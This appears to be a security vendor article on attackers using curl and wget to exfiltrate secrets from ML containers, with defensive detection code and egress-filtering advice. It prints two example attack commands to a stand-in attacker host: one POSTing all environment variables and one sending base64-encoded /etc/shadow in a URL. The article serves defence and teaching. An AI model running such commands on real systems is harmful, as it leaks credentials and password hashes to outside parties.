Data Exfiltration via LotL: Abusing Curl and Wget in ML Containers
Modern threat actors who achieve Remote Code Execution (RCE) within a CI/CD pipeline or an isolated Docker container rarely risk downloading custom, compiled malware binaries. Instead, they rely heavily on "Living off the Land" (LotL) tactics: weaponizing legitimate, pre-installed system utilities to achieve their objectives.
Machine Learning container images are notoriously bloated with C libraries and general-purpose utilities, so curl or wget is present in most of them. These network utilities are an ideal vector for the rapid exfiltration of environment variables, configuration files, and access tokens.
The Architecture of Egress Exfiltration
When an adversary injects a payload (e.g., via a poisoned PyPI dependency or the exploitation of a Pickle deserialization vulnerability in a PyTorch model), the primary operational goal is to extract high-value secrets from the isolated environment and transmit them to an external Command and Control (C2) server.
Exfiltration via HTTP POST
The most robust method for transmitting multi-line secrets (such as RSA private keys or full environment variable dumps) is via an HTTP POST request, encapsulating the payload within the request body.
# Executing LotL data exfiltration via curl
# Extracting all environment variables and transmitting them to a remote webhook
curl -X POST https://attacker-controlled-endpoint.com/ingest \
-H "Content-Type: text/plain" \
-d "$(env)"
Exfiltration via URI Parameters (HTTP GET)
If the infrastructure uses a Web Application Firewall (WAF) or egress proxy that blocks POST requests to unverified domains, attackers pivot to HTTP GET requests. With the secrets encoded directly into the URI query parameters, the exfiltration traffic superficially resembles routine API polling or a tracking-pixel fetch, and it can slip past rudimentary anomaly detection heuristics.
# Extracting local shadow password hashes via wget and base64 encoding
PAYLOAD=$(base64 -w 0 /etc/shadow)
wget -qO- "https://attacker-controlled-endpoint.com/pixel.gif?data=$PAYLOAD"
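On the defensive side, GET-based exfiltration tends to leave long, high-entropy query values in egress proxy logs. The following is a minimal detection sketch, not a production detector: the function names, the length threshold, and the entropy threshold are all assumptions chosen for illustration and would need tuning against real traffic.

```python
import math
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Hypothetical thresholds; tune against real traffic before relying on them.
MIN_LENGTH = 64          # ignore short values such as page numbers or IDs
MIN_ENTROPY_BITS = 4.0   # bits per character; base64 data tends to sit higher
BASE64_RE = re.compile(r"[A-Za-z0-9+/_=-]+")  # standard and URL-safe alphabets


def shannon_entropy(value: str) -> float:
    """Return the Shannon entropy of a string in bits per character."""
    if not value:
        return 0.0
    total = len(value)
    counts = Counter(value)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def suspicious_params(url: str) -> list[str]:
    """Return the names of query parameters that look like encoded payloads."""
    flagged = []
    for pair in urlsplit(url).query.split("&"):
        # Split on the first "=" only, so base64 padding stays in the value.
        name, _, raw_value = pair.partition("=")
        value = unquote(raw_value)  # keeps "+" intact, unlike unquote_plus
        if (
            len(value) >= MIN_LENGTH
            and BASE64_RE.fullmatch(value)
            and shannon_entropy(value) >= MIN_ENTROPY_BITS
        ):
            flagged.append(name)
    return flagged
```

Running `suspicious_params` over each URL in an egress log would surface requests like the `pixel.gif?data=...` call above while ignoring ordinary parameters such as `page=2`. An attacker can evade this by chunking the payload across many short requests, so it complements egress filtering rather than replacing it.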
Static Analysis and Layer 7 Egress Filtering
Securing ML containers against LotL exfiltration requires a dual-layer architectural defense:
- Network Egress Filtering (Layer 3/4): At the Kubernetes NetworkPolicy or VPC Security Group level, deny all outbound traffic by default (Default Deny). Permit egress only to a strict allowlist of destinations (e.g., official PyPI mirrors, Hugging Face Hub, specific AWS S3 buckets). Because these controls match IP ranges and ports rather than domain names, enforcing a domain allowlist generally requires an FQDN-aware egress proxy or CNI policy alongside them.
- AST Code Analysis (Layer 7): Infrastructure-as-Code (IaC), bash scripts, Jupyter Notebooks, and Python execution wrappers must be statically analyzed before they run to detect anomalous invocations of system network utilities.
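The default-deny decision for the first layer can be sketched in a few lines. This is an illustration of the allowlist logic an egress proxy might apply, assuming exact hostname matching over HTTPS only; `ALLOWED_HOSTS` and `is_egress_allowed` are hypothetical names, and the host list is a placeholder rather than a recommended set.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; the real set depends on which registries and
# buckets the pipeline actually needs.
ALLOWED_HOSTS = frozenset({"pypi.org", "files.pythonhosted.org", "huggingface.co"})


def is_egress_allowed(url: str, allowed_hosts: frozenset = ALLOWED_HOSTS) -> bool:
    """Default deny: permit only HTTPS requests to an exactly matching host."""
    parts = urlsplit(url)
    # urlsplit lowercases the hostname; also drop a trailing root dot.
    host = (parts.hostname or "").rstrip(".")
    return parts.scheme == "https" and host in allowed_hosts
```

Exact matching is a deliberate choice here: a suffix or substring match would let a lookalike such as `pypi.org.evil.example` through, whereas anything not listed verbatim is rejected.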
By integrating Veritensor into your CI/CD pipeline, you establish a powerful Abstract Syntax Tree (AST) analysis layer. The Veritensor engine statically evaluates invocations of curl and wget within os.system or subprocess.Popen calls. If the engine detects parameter concatenation with environment variables, the reading of sensitive OS paths (/etc/*, ~/.aws/), or outbound requests targeting known ephemeral webhook services, the build is flagged as critically vulnerable and deterministically halted.